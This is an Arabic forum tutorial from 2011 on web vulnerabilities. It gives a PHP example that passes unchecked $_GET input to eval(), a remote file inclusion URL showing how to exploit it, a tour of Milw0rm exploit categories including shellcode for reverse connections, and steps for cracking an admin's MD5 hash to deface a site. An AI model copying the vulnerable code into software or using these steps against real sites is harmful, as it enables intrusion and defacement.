admin مؤسس المنتدى
302 50970 4
| موضوع: اهم درس للثغرات الخميس يوليو 21, 2011 8:35 pm | |
| [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] ا
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط][url=https://2img.net/r/ihimizer/img706/7269/689424229.gif]
[/url] درسنا هو عباره عن الثغرات؟ماهي الثغرات؟ماهي انواعها؟من اين نحصل عليها؟
بسم الله نبدأ.
ماهي الثغرات:-
هي داله او دوال تمكنك من استخدامها بطرق غير شرعيه, و ذلك اما بادراج اكواد, او اضافه رابط,
او استعلام عن اوامر القاعده او تطبيق اوامر مباشره,
و الهدف كله يصب في معرفه معلومات و باسوردات و خفايا موقعك التي لا تمكن الشخص العادي من معرفتها,
وطبعا تختلف مدى خطوره الثغرات من ثغره الى اخرى,
الان عرفنا تقريبا ما هي الثغرات و من ماذا تمكنا اذا وجدناها.
سؤال: ما هو سبب حدوث هذه الاخطاء..!!
السبب: يكمن بخطأ مبرمج و ذلك بترك مجال لعمليه مفتوحه المصدر دون ان يغلقها,
مثال :
$mos = $_GET['mos']; eval($mos); ?>
يعني: لو فرضنا انه المبرمج هنا ترك ملف mos = مفتوح ((طبعا الملف وقت الطلب يحضر لك الملف المربوط معه و هو
mos)) لو فرضنا انه تركه مفتوح دون اغلاقه و الواضح بعلامه $_GET انت وقتها تستطيع ان تدرج ملف او رابط اخر من
خارج الموقع او السيرفر,و هذا ما يسمى بثغرات الفايل انكلود,وهي ثغرات تسمح لك بادراج ملف باكدور للاتصال
بالسيرفر واختراقه.
طريقه الاستغلال :
eval.php?mos=include($include);&include=http://www.google.com
eval.php = إسم الملف
mos = هذي المتغير إلي يستقبل أكواد من الخارج
include = داله إستدعاء ملف
$include = المتغير المراد إستدعائه
الان عرفنا ماهي الثغرات,وشرح مبسط عن كيفيه الاستغلال,
نأتي للقسم الثاني من الدرس الي هو ماهي انواع الثغرات ومن اين نحصل عيها.
الان انته تيجي تسأل سؤال من اين احصل عل الثغرات..!!
تستطيع الحصول على اخر الثغرات من مواقع السيكيوريتي,وافضل موقع يقدم هذه الثغرات اللي هو موقع
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]الان نأتي لانواع الثغرات اللي تنزل بالموقع.
نبدأ بشرح انواع الثغرات,
نجي لأول نوع من ثغرات..
ثغرات الريموت:
ReMoTe
] [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]هذه الثغرات تعتبر من اقوى انواع الثغرات,ومعناها التحكم عن بعد,يعني تتحكم في السيرفر من بعد
شرط ان الثغره يجب ان تعمل وان لا تكون مرقعه,وأن يكون البرنامج المصاب بالثغره مركب على السيرفر,
يعني مثلا فحصنا السيرفر من الثغرات وطلع فيه برنامج يشتغل على بورت معين ومصاب بالثغره,
تجد الثغرات في هذا القسم,وطبها هذا الاختراق المتقدم والمستهدف.
النوع الثاني من الثغرات ثغرات اللوكل:
LoCaL [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] هذه الثغرات نفس ثغرات النوع الاول,ولكن تختلف عنها بشكل خفيف,وهذه الثغرات تنزل غير مترجمه
وتكون مكتوبه بلغه السي,وهذه الثغرات خاصه ايضا بالبرامج والثغره قويه بس اخف من الريموت بشوي,
النوع الثالث من الثغرات..ثغرات الويب:
W e b Apps
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]هذه ثغرات سكريبتات المواقع,يعني السكربتات اللي بتكون مركبه على المواقع او السيرفر, مثل سكريبتات الصور وسكريبتات التحميل..آلخ.واي ثغره بتكتشف بتنزل في هذا القسم مع الاستغلال,
وثغرات السكريبتات انواع مثل ماشرحنا فوق,مثل ثغرات الفايل انكلود وثغرات الـSQL والكوماند,
واستغلالها يكون سهل.سنتطرق اليه في مواضيع ثانيه.
النوع الرابع من الثغرات:
dos / poc
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
هذه الثغرات غير قويه وقليل ما تزبط معك,ماتقدر تسوي شيء فيها الا عمل كراش وتعليق للسيرفر,
يعني ماتقدر تلعب بالمواقع اللي على السيرفر, ولا تحط اندالله يراكولا شيء بس تعلق السيرفر ,
يعني مافيها فايده الا التعليق وعمل كراش,
النوع الخامس من الثغرات:
S h e l l Code
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط][url=http://www10.0zz0.com/2010/05/17/20/206159707.png]
[/url] هذه الثغرات هي عباره عن كود برمجي ي تحقنه في الموقع من خلال الشل او غير يخليك تتصل عكسي او يضيف
يوزر جديد..آلخ,ابس لازم يكون البرنامج مركب في السيرفر. القسم السادس من الـMilw0rm
papers
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
هذه زي الكتب بس غالبا او دائما ماتلقى كتاب عربي.
القسم السابع وهو قسم الفيديوهات:
Videos
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] هذا القسم ينزل في شروحات فيديو للثغرات,لكن ما فيه عربي.
نيجي لقسم اخر وهو قسم مهم في الـMilw0rm
اللي هو فك تشفير الباسوردات,مثلا جبت ثغره واستغليتها وطلع لك اسم الادمن والباسورد مشفر
وغالبا الباسورد ما يكون مشفر بمقياس Md5 في نفس الموقع تستطيع فك تشفير الباسورد,واختراق الموقع
بدخول الى لوحه التحكم الرئيسيه وتعليق الاندالله يراكالخاص بك.
نشرح كيف نفك الباسورد:
نذهب الى كلمه Cracker
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
ثم نذهب الى insert
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]ثم نملأ البيانات [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]انتهى الشرح بحمد الله [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط][ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
| |
|